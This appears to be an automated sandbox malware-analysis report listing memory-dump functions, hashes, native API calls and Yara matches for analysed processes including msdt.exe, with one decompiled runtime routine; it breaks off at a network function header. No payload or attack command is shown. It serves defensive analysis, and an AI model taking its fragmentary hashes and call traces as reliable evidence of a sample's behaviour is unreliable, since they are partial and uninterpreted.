                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.273989113.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 84f9349dcbe8c14ce4b94011731971fee3ee08ee14720653a0535a1deb889c51
                                                                                • Instruction ID: 89f98db0f3eb6d282948df418d73f6c62b2f969274da9508d1c86c7113ec9258
                                                                                • Opcode Fuzzy Hash: 84f9349dcbe8c14ce4b94011731971fee3ee08ee14720653a0535a1deb889c51
                                                                                • Instruction Fuzzy Hash: 5990026120504443D24065695408A460409D7D1345F51D031A1054595ED6759851F171
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00AAA770, Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.273989113.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a3a467386f3f6d2c2db63433275328b97d1e958337217edd3546db674039fa6b
                                                                                • Instruction ID: 1407dcf5a6e870b0e1fffdcd91625bba82f79131df090ed1ac233d2e2e9f6331
                                                                                • Opcode Fuzzy Hash: a3a467386f3f6d2c2db63433275328b97d1e958337217edd3546db674039fa6b
                                                                                • Instruction Fuzzy Hash: CE90027520504443D64065695804AC70409D7D1345F51D431A041459CED6949861F161
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00AA9670, Relevance: .0, Instructions: 2COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.273989113.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                • Instruction ID: 5af8322f4f95ad0ade0990ce6918233cddeed9e1a90a3dff63dd899b2780db26
                                                                                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                • Instruction Fuzzy Hash:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00AFFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 53%
                                                                                			E00AFFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00AACE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E00AF5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E00AF5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                0x00affdda
                                                                                0x00affde2
                                                                                0x00affde5
                                                                                0x00affdec
                                                                                0x00affdfa
                                                                                0x00affdff
                                                                                0x00affe0a
                                                                                0x00affe0f
                                                                                0x00affe17
                                                                                0x00affe1e
                                                                                0x00affe19
                                                                                0x00affe19
                                                                                0x00affe19
                                                                                0x00affe20
                                                                                0x00affe21
                                                                                0x00affe22
                                                                                0x00affe25
                                                                                0x00affe40

                                                                                APIs
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AFFDFA
                                                                                Strings
                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00AFFE2B
                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00AFFE01
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.273989113.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                • API String ID: 885266447-3903918235
                                                                                • Opcode ID: 39207f8fa1284adc6ca361b59df95119587a5ec41a71054cdfdb9cfbdaa68416
                                                                                • Instruction ID: e48dd4179ea285de304f4e78694fd3cf748494568bc6589bbaec442085be3071
                                                                                • Opcode Fuzzy Hash: 39207f8fa1284adc6ca361b59df95119587a5ec41a71054cdfdb9cfbdaa68416
                                                                                • Instruction Fuzzy Hash: FEF0F632640605BFEA201A95DD02F33BF6AEB45730F240714F728565E2EA62F82097F0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Analysis Process: msdt.exe PID: 5880 Parent PID: 3472 msdt.exeCOMMON

                                                                                Executed Functions

                                                                                Function 02A8817A, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59filenativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • NtCreateFile.NTDLL(00000060,00000000,.z`,02A83B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02A83B97,007A002E,00000000,00000060,00000000,00000000), ref: 02A8820D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.491652950.0000000002A70000.00000040.00000001.sdmp, Offset: 02A70000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID: .z`
                                                                                • API String ID: 823142352-1441809116
                                                                                • Opcode ID: 74128cedc668c003c8c5871bfcd3d55ae743e2caa364d32285d8391725f24b91
                                                                                • Instruction ID: 57f40a5df7f6d832dd74fd040968421b3e3d6c73fdfdbab0e1b987e4fb2117c7
                                                                                • Opcode Fuzzy Hash: 74128cedc668c003c8c5871bfcd3d55ae743e2caa364d32285d8391725f24b91
                                                                                • Instruction Fuzzy Hash: F411A5B2204209ABDB18DF98DC84DEB77ADAF8C750B158548FA5D97241CA34E8118BA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02A881BA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • NtCreateFile.NTDLL(00000060,00000000,.z`,02A83B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02A83B97,007A002E,00000000,00000060,00000000,00000000), ref: 02A8820D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.491652950.0000000002A70000.00000040.00000001.sdmp, Offset: 02A70000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID: .z`
                                                                                • API String ID: 823142352-1441809116
                                                                                • Opcode ID: 8b0d11924ab6892fae6f044f30e74a5d3f21072cb3ed0bb76370e21e93a43356
                                                                                • Instruction ID: 2d33e8b7108c529d3652ae4693106133783df7278a71028878e5ab2624348942
                                                                                • Opcode Fuzzy Hash: 8b0d11924ab6892fae6f044f30e74a5d3f21072cb3ed0bb76370e21e93a43356
                                                                                • Instruction Fuzzy Hash: D201A4B2251108AFCB48DF88DC95DEB77A9EF8C754F158248FA1997240DA30E8518BA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02A881C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • NtCreateFile.NTDLL(00000060,00000000,.z`,02A83B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02A83B97,007A002E,00000000,00000060,00000000,00000000), ref: 02A8820D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.491652950.0000000002A70000.00000040.00000001.sdmp, Offset: 02A70000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID: .z`
                                                                                • API String ID: 823142352-1441809116
                                                                                • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                • Instruction ID: 2de269e3abf0efb130dbc9035c7e68f0829320e64b211a0a5f6ff99bc3b496f1
                                                                                • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                • Instruction Fuzzy Hash: 18F0B6B2200208AFCB08DF88DC84DEB77ADAF8C754F158248FA0D97240DA30E8118BA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02A8826A, Relevance: 1.5, APIs: 1, Instructions: 39filenativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • NtReadFile.NTDLL(02A83D52,5E972F59,FFFFFFFF,02A83A11,?,?,02A83D52,?,02A83A11,FFFFFFFF,5E972F59,02A83D52,?,00000000), ref: 02A882B5
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.491652950.0000000002A70000.00000040.00000001.sdmp, Offset: 02A70000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileRead
                                                                                • String ID:
                                                                                • API String ID: 2738559852-0
                                                                                • Opcode ID: 2d7d89b025c2b5a9e824c593b4c59b720c1709a6c93e724328171e034f9531c6
                                                                                • Instruction ID: 65506b8c08e088ddd23edd7937cc7a70ef423eac2b1d632e05eae98e941ac658
                                                                                • Opcode Fuzzy Hash: 2d7d89b025c2b5a9e824c593b4c59b720c1709a6c93e724328171e034f9531c6
                                                                                • Instruction Fuzzy Hash: 34F09C75200108AFDB14DF89DC90DEB77ADAF8C754F158658BE1D97241DA30E8518BA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02A88270, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • NtReadFile.NTDLL(02A83D52,5E972F59,FFFFFFFF,02A83A11,?,?,02A83D52,?,02A83A11,FFFFFFFF,5E972F59,02A83D52,?,00000000), ref: 02A882B5
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.491652950.0000000002A70000.00000040.00000001.sdmp, Offset: 02A70000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileRead
                                                                                • String ID:
                                                                                • API String ID: 2738559852-0
                                                                                • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                • Instruction ID: e044f6a98b116acb23f0cf6206cf9b082ec143ba3f7211e75403c9c97b0aad04
                                                                                • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                • Instruction Fuzzy Hash: AFF0A4B2200208AFCB14DF89DC80EEB77ADAF8C754F158648BA1D97241DA30E8118BA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02A883A0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02A72D11,00002000,00003000,00000004), ref: 02A883D9
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.491652950.0000000002A70000.00000040.00000001.sdmp, Offset: 02A70000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateMemoryVirtual
                                                                                • String ID:
                                                                                • API String ID: 2167126740-0
                                                                                • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                • Instruction ID: 0d3256a68c819a96b68b016ab17fac2d27723b095357e22a75ffc4c827214836
                                                                                • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                • Instruction Fuzzy Hash: 3AF015B2200208AFCB14DF89CC80EAB77ADAF88750F118548FE0897241CA30F810CBA0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02A882F0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • NtClose.NTDLL(02A83D30,?,?,02A83D30,00000000,FFFFFFFF), ref: 02A88315
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.491652950.0000000002A70000.00000040.00000001.sdmp, Offset: 02A70000, based on PE: false
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Close
                                                                                • String ID:
                                                                                • API String ID: 3535843008-0
                                                                                • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                • Instruction ID: c9d1f132a3c670c4f6010495c9ca75835d6b05e0c5b1b81b10a365d5aee3889a
                                                                                • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                • Instruction Fuzzy Hash: 5FD01776240318ABD710EF98CC85EA77BADEF48760F154499BA189B242D930FA008AE0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 04D595D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.492878773.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: true
                                                                                • Associated: 00000005.00000002.493585780.0000000004E0B000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000005.00000002.493607962.0000000004E0F000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 9420ecefde8a261be5e5f8c61b841d544b407545fc9bdda5634c1115bb766eaf
                                                                                • Instruction ID: ce0e4c6769f8116eba93437de743537e2407a9e0cafd5cafc397a606160641c1
                                                                                • Opcode Fuzzy Hash: 9420ecefde8a261be5e5f8c61b841d544b407545fc9bdda5634c1115bb766eaf
                                                                                • Instruction Fuzzy Hash: B79002A1302004076105715A5414616401B97E4245B52C021E10155A0DC965D8D17165
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 04D59540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.492878773.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: true
                                                                                • Associated: 00000005.00000002.493585780.0000000004E0B000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000005.00000002.493607962.0000000004E0F000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 2d5f5ca38b735ec5f1b606a4c60ec501e945e8babc09f4e98b6455ba5f7044d1
                                                                                • Instruction ID: 68f89e4c0c454c793d944ffd31ff2c19f799f9e99e98310e6747ba17af7dd295
                                                                                • Opcode Fuzzy Hash: 2d5f5ca38b735ec5f1b606a4c60ec501e945e8babc09f4e98b6455ba5f7044d1
                                                                                • Instruction Fuzzy Hash: 65900265311004072105A55A1704507005797D9395352C021F1016560CDA61D8A16161
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 04D596D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.492878773.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: true
                                                                                • Associated: 00000005.00000002.493585780.0000000004E0B000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000005.00000002.493607962.0000000004E0F000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 44b8d8256b5333cb3bdfe718adc16300b6b69d4f26109d858cb5b272f1047c3f
                                                                                • Instruction ID: 1987fb79f8eceedf6d4b139f71398e3471d3e2bf38c91b2ae2ce60b59da798e2
                                                                                • Opcode Fuzzy Hash: 44b8d8256b5333cb3bdfe718adc16300b6b69d4f26109d858cb5b272f1047c3f
                                                                                • Instruction Fuzzy Hash: 8E90027130100C47F100615A5404B46001697E4345F52C016A0125664DCA55D8917561
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 04D596E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.492878773.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: true
                                                                                • Associated: 00000005.00000002.493585780.0000000004E0B000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000005.00000002.493607962.0000000004E0F000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: ff119ee689bd7d225eb52997859f44de0df8a9aa320af429c31ccf18e8f06ed5
                                                                                • Instruction ID: 734ce30d58bd45a45d90fb9132534e2126e824f53b4cbf9c18d4a6213e100fa1
                                                                                • Opcode Fuzzy Hash: ff119ee689bd7d225eb52997859f44de0df8a9aa320af429c31ccf18e8f06ed5
                                                                                • Instruction Fuzzy Hash: FB90027130108C07F110615A940474A001697D4345F56C411A4425668DCAD5D8D17161
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 04D59650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.492878773.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: true
                                                                                • Associated: 00000005.00000002.493585780.0000000004E0B000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000005.00000002.493607962.0000000004E0F000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 97ac46ff2425b5f228ed98979785a9afed4d628cfa88c93f71f35b529b8f31ed
                                                                                • Instruction ID: dd8301b4d481686f4c1a5e19e394775ba4892f21a291b180aef06a39223e5b8a
                                                                                • Opcode Fuzzy Hash: 97ac46ff2425b5f228ed98979785a9afed4d628cfa88c93f71f35b529b8f31ed
                                                                                • Instruction Fuzzy Hash: 8B90027130504C47F140715A5404A46002697D4349F52C011A00656A4DDA65DD95B6A1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 04D59660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.492878773.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: true
                                                                                • Associated: 00000005.00000002.493585780.0000000004E0B000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000005.00000002.493607962.0000000004E0F000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 2dc1d957855147fe45987e247e5e8e8f2d229408f02d5c6beffb7e0dfc11b58f
                                                                                • Instruction ID: 689317bb4a7f8132101b61da2083ec879f647f1f1e51fcb37dcc2ffacaa8a1b8
                                                                                • Opcode Fuzzy Hash: 2dc1d957855147fe45987e247e5e8e8f2d229408f02d5c6beffb7e0dfc11b58f
                                                                                • Instruction Fuzzy Hash: E690027130100C07F180715A540464A001697D5345F92C015A0026664DCE55DA9977E1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 04D59FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.492878773.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: true
                                                                                • Associated: 00000005.00000002.493585780.0000000004E0B000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000005.00000002.493607962.0000000004E0F000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 16d11d126ab3b08c388d6d8376eb4ca76769b3f77b98a6f7aae1ef244c430882
                                                                                • Instruction ID: 3afefaa921e35196ec66b3111d0ff9b62b541524792853a22479f7993e243498
                                                                                • Opcode Fuzzy Hash: 16d11d126ab3b08c388d6d8376eb4ca76769b3f77b98a6f7aae1ef244c430882
                                                                                • Instruction Fuzzy Hash: 6590027131114807F110615A9404706001697D5245F52C411A0825568DCAD5D8D17162
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 04D59780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.492878773.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: true
                                                                                • Associated: 00000005.00000002.493585780.0000000004E0B000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000005.00000002.493607962.0000000004E0F000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 91349543e55bddf70e53c9179cf6727836957b1f2091b376bda56dedeb76dea3
                                                                                • Instruction ID: 2d0529d88d5e6b738b27ae1c00488de0e0d20ab8009f908d9bbea45c83f19ecf
                                                                                • Opcode Fuzzy Hash: 91349543e55bddf70e53c9179cf6727836957b1f2091b376bda56dedeb76dea3
                                                                                • Instruction Fuzzy Hash: 8890026931300407F180715A640860A001697D5246F92D415A0016568CCD55D8A96361
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 04D59710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.492878773.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: true
                                                                                • Associated: 00000005.00000002.493585780.0000000004E0B000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000005.00000002.493607962.0000000004E0F000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 8764152b82385156902d0c51cd9887f7cae1695b3f2d8cdf0b8eaeb4848e67e6
                                                                                • Instruction ID: 886964ddc73b74b97f2d690695a6f12c2445ea1a0a15375a3bb1f017477f4270
                                                                                • Opcode Fuzzy Hash: 8764152b82385156902d0c51cd9887f7cae1695b3f2d8cdf0b8eaeb4848e67e6
                                                                                • Instruction Fuzzy Hash: DD90027130100807F100659A6408646001697E4345F52D011A5025565ECAA5D8D17171
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 04D59840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.492878773.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: true
                                                                                • Associated: 00000005.00000002.493585780.0000000004E0B000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000005.00000002.493607962.0000000004E0F000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 5f747c4d69ab5ae0cede516468b4246377a71ab1a1997759123de4143f04660d
                                                                                • Instruction ID: cd0d4dd786bf1729619fc521b3c06b640e0e7ddc845768ca054df6a6654910df
                                                                                • Opcode Fuzzy Hash: 5f747c4d69ab5ae0cede516468b4246377a71ab1a1997759123de4143f04660d
                                                                                • Instruction Fuzzy Hash: 9D900261342045577545B15A54045074017A7E4285792C012A1415960CC966E896E661
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 04D59860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.492878773.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: true
                                                                                • Associated: 00000005.00000002.493585780.0000000004E0B000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000005.00000002.493607962.0000000004E0F000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 5cda09438a3e6f9a9867ab84c9566a956f41a9b8b5972dbe32529d3320602ea6
                                                                                • Instruction ID: a8ba3bf335c555d6b7b0ec23b3bbe91f6dbb3b0971c8865616f6a16471be283d
                                                                                • Opcode Fuzzy Hash: 5cda09438a3e6f9a9867ab84c9566a956f41a9b8b5972dbe32529d3320602ea6
                                                                                • Instruction Fuzzy Hash: 7390027130100817F111615A5504707001A97D4285F92C412A0425568DDA96D992B161
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 04D599A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.492878773.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: true
                                                                                • Associated: 00000005.00000002.493585780.0000000004E0B000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000005.00000002.493607962.0000000004E0F000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: 2fdf009927e32ddc857a6d854a8a95e8ae7e9d9cf949ad76fd68c6694e23a3ee
                                                                                • Instruction ID: b372cd3420d25ee8b23537fe1468967421487e5a2e6d2f0f6045c0edd37f7b7f
                                                                                • Opcode Fuzzy Hash: 2fdf009927e32ddc857a6d854a8a95e8ae7e9d9cf949ad76fd68c6694e23a3ee
                                                                                • Instruction Fuzzy Hash: F09002A134100847F100615A5414B060016D7E5345F52C015E1065564DCA59DC927166
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 04D59910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.492878773.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: true
                                                                                • Associated: 00000005.00000002.493585780.0000000004E0B000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000005.00000002.493607962.0000000004E0F000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: ac6163bd23db4af280487cea83c506ba87bcfd69703f8492dbc9d5f8d6c90c6a
                                                                                • Instruction ID: d2b137699928fd1dac2a3c0c85c9cf2cbd9456934826eb2f561349f0984f9d56
                                                                                • Opcode Fuzzy Hash: ac6163bd23db4af280487cea83c506ba87bcfd69703f8492dbc9d5f8d6c90c6a
                                                                                • Instruction Fuzzy Hash: 6B9002B130100807F140715A5404746001697D4345F52C011A5065564ECA99DDD576A5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 04D59A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.492878773.0000000004CF0000.00000040.00000001.sdmp, Offset: 04CF0000, based on PE: true
                                                                                • Associated: 00000005.00000002.493585780.0000000004E0B000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000005.00000002.493607962.0000000004E0F000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                • Opcode ID: d9a6b0ad0607700b1c0976d3e227228d19f2f780a21071b5f1e2c0cc30688505
                                                                                • Instruction ID: 01e68c6055db661aa1b7bfdeb081e75c46e46aecc13142f785857194cefbb9e1
                                                                                • Opcode Fuzzy Hash: d9a6b0ad0607700b1c0976d3e227228d19f2f780a21071b5f1e2c0cc30688505
                                                                                • Instruction Fuzzy Hash: 3890026131180447F200656A5C14B07001697D4347F52C115A0155564CCD55D8A16561
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 02A888D0, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 48networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
